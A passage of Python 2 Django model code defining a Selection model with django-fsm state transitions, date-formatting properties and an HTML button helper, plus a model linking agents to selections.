def save(self, *args, **kwargs):
self.last_modified = datetime.datetime.today()
return super(Selection, self).save(*args, **kwargs)
@transition(field=state, source='new', target='validated')
def validate(self):
print "Selection state update to created"
pass
@transition(field=state, source='validated', target='payed')
def payed(self):
pass
@transition(field=state, source='payed', target='pdf_generated')
def generate_pdf(self):
pass
@transition(field=state, source='pdf_generated', target='exported')
def export(self):
pass
@property
def get_created_date_formated(self):
return date_format(self.created, "SHORT_DATE_FORMAT")
@property
def get_updated_date_formated(self):
return date_format(self.updated, "SHORT_DATETIME_FORMAT")
def add_action_button(self, **kwargs):
if self.state == 'created':
return """<a class='btn' href="/client/~client/data?selectionid=%s">""" % (self.id)
else:
return """bloque"""
objects = SelectionQuerySet.as_manager()
post_save.connect(Selection().validate, Selection, dispatch_uid="Selection_validated")
class SelectionAgentsRelationship(models.Model):
agent = models.ForeignKey(Agent, blank=True, null=True)
selection = models.ForeignKey(Selection, blank=True, null=True)
def __unicode__(self):
return unicode(self.selection)
class Meta():
auto_created = True
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.